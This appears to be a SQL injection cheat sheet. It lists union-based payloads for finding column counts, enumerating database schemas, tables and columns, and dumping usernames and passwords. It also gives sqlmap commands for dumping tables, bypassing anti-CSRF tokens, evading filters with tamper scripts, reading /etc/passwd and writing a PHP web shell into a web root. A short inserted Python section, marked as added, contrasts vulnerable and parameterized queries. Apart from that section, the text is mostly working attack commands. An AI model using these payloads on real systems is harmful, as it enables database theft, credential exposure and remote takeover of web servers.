
SQL Injection

Union Injection

' order by 2-- -
' order by 3-- -
' UNION select 1,2,3-- -
' UNION select 1,2,3,4-- -

Database Enumeration

' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Current database

' UNION select 1,database(),2,3-- -

Tables

' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

When only one row is displayed, use GROUP_CONCAT(table_name) to return all table names in a single row.

Columns

' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

When only one row is displayed, use GROUP_CONCAT(column_name) to return all column names in a single row.

Data

' UNION select 1, username, password, 4 from dev.credentials-- -
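The union payloads above and the column-count probes in the Union Injection section only work because user input is spliced into the query text. The following example is added here and is not part of the original page: it runs a constructed in-memory SQLite stand-in for the dev.credentials table through a string-built query and its parameterized replacement, and shows why the ORDER BY / UNION SELECT 1,2,3 ladder depends on the database's column-count error reaching the client.

```python
import sqlite3

# Constructed in-memory stand-in for the page's "dev" database: a products
# table behind a 4-column search page and the credentials table being targeted.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT, stock TEXT);
        INSERT INTO products VALUES (1, 'widget', '9.99', '12');
        CREATE TABLE credentials(id INTEGER, username TEXT, password TEXT, role TEXT);
        INSERT INTO credentials VALUES (1, 'admin', 'constructed-hash', 'dba');
    """)
    return conn

def search_vulnerable(conn, q):
    # String interpolation: q is parsed as SQL grammar, so a quote closes the
    # literal, UNION appends a second SELECT and "-- -" comments out the tail.
    sql = f"SELECT id, name, price, stock FROM products WHERE name = '{q}'"
    return conn.execute(sql).fetchall()

def search_safe(conn, q):
    # Parameter binding: q reaches the engine as a value, never as syntax, so
    # the same input can only ever match a product literally named that way.
    sql = "SELECT id, name, price, stock FROM products WHERE name = ?"
    return conn.execute(sql, (q,)).fetchall()

def union_accepted(conn, q):
    # The ORDER BY n / UNION SELECT 1,2,3 ladder works because the database
    # rejects a UNION whose column count differs from the left-hand SELECT.
    # Returning that error to the client is what reveals the query width;
    # a generic error page denies that feedback.
    try:
        search_vulnerable(conn, q)
        return True
    except sqlite3.OperationalError:
        return False

if __name__ == "__main__":
    payload = "' UNION select 1,username,password,4 from credentials-- -"
    print("vulnerable:", search_vulnerable(make_db(), payload))
    print("safe:      ", search_safe(make_db(), payload))
    print("3 columns: ", union_accepted(make_db(), "' UNION select 1,2,3-- -"))
    print("4 columns: ", union_accepted(make_db(), "' UNION select 1,2,3,4-- -"))
```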

SQLMap

Prefix/Suffix

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Basic DB Data Enumeration

  • Database version banner (switch --banner)
  • Current user name (switch --current-user)
  • Current database name (switch --current-db)
  • Checking if the current user has DBA (administrator) rights (switch --is-dba)

Limit Output

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

Conditional Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Searching for Data

Search for all table names containing the keyword "user":

sqlmap -u "http://www.example.com/?id=1" --search -T user

Search for all column names containing the keyword "pass":

sqlmap -u "http://www.example.com/?id=1" --search -C pass

Anti-CSRF Token Bypass

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp

Tamper Scripts

sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=space2comment,charencode
Tamper script                Description
0eunion                      Replaces instances of UNION with e0UNION
base64encode                 Base64-encodes all characters in a given payload
between                      Replaces greater-than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #
commalesslimit               Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M
equaltolike                  Replaces all occurrences of the equals operator (=) with its LIKE counterpart
halfversionedmorekeywords    Adds a (MySQL) versioned comment before each keyword
modsecurityversioned         Embraces the complete query with a (MySQL) versioned comment
modsecurityzeroversioned     Embraces the complete query with a (MySQL) zero-versioned comment
percentage                   Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat                  Replaces plus operator (+) with its (MsSQL) CONCAT() function counterpart
randomcase                   Replaces each keyword character with random case (e.g. SELECT -> SEleCt)
space2comment                Replaces space character ( ) with comments /**/
space2dash                   Replaces space character ( ) with a dash comment (--) followed by a random string and a newline (\n)
space2hash                   Replaces (MySQL) space character ( ) with # followed by a random string and a newline (\n)
space2mssqlblank             Replaces (MsSQL) space character ( ) with a random blank character from a valid alternate set
space2plus                   Replaces space character ( ) with +
space2randomblank            Replaces space character ( ) with a random blank character from a valid alternate set
symboliclogical              Replaces AND and OR with their symbolic counterparts && and ||
versionedkeywords            Encloses each non-function keyword with a (MySQL) versioned comment
versionedmorekeywords        Encloses each keyword with a (MySQL) versioned comment

Reading Local Files

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Writing Local Files

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"